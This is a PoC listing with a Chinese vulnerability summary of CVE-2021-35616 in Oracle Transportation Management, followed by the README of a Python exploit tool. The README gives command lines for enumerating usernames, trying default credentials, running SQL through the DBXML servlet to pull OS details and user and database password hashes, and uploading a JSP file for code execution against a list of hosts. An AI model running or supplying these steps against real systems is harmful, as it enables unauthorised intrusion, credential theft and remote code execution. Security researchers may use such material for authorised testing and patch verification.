POC详情: 6df38a15d062d8e94f9919012e6187ff53909b12

标题: Oracle Transportation Management 安全漏洞 (CVE-2021-35616)
描述:Oracle Transportation Management(Otm)是美国甲骨文(Oracle)公司的一种面向托运人和物流供应商的工具。用于提供运输规划和执行功能,并将运输规划、执行、运费支付和业务流程自动化集成到一个跨所有运输模式的应用程序上。 Oracle Supply Chain存在安全漏洞,该漏洞源于Oracle Supply Chain 的 Oracle 运输管理产品中的漏洞(组件:UI 基础设施)。受影响的受支持版本是 6.4.3。容易利用的漏洞允许通过 HTTP 访问网络的低特权攻击者
Python tool for exploiting CVE-2021-35616 
# OracleOTM
Python tool for exploiting CVE-2021-35616 

The script works in modules, which I implemented in the following order:

►	Username enumeration

►	Search for default credentials

►	Run an SQL query using DBXML servlet

►	Full exploitation and JSP execution

The syntax of the script is as follows: 

.\OracleOTM.py {module} {host TXT file} {additional parameters}

Username enumeration: .\OracleOTM.py enum {hosts TXT file} -u users.txt

Search for default credentials: .\OracleOTM.py default {hosts TXT file}

Run an SQL query using DBXML servlet:	.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"

I also prepared some predefined queries that I found useful; you can access them directly, as follows:

.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os 

    OS – Extract the server’s OS 

    Osuser – Extract the OS user running the DB

    Hostname – DB server host name 

    Hostip – DB server IP address 

    Passwords – Extracts the OTM users and their hashed passwords

     Oraversion – The DB version 

    Dbusershash – The DB users’ password hashes

    Dbfileslocation – The location of the DB files in the OS

Full exploitation and JSP execution:	.\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"


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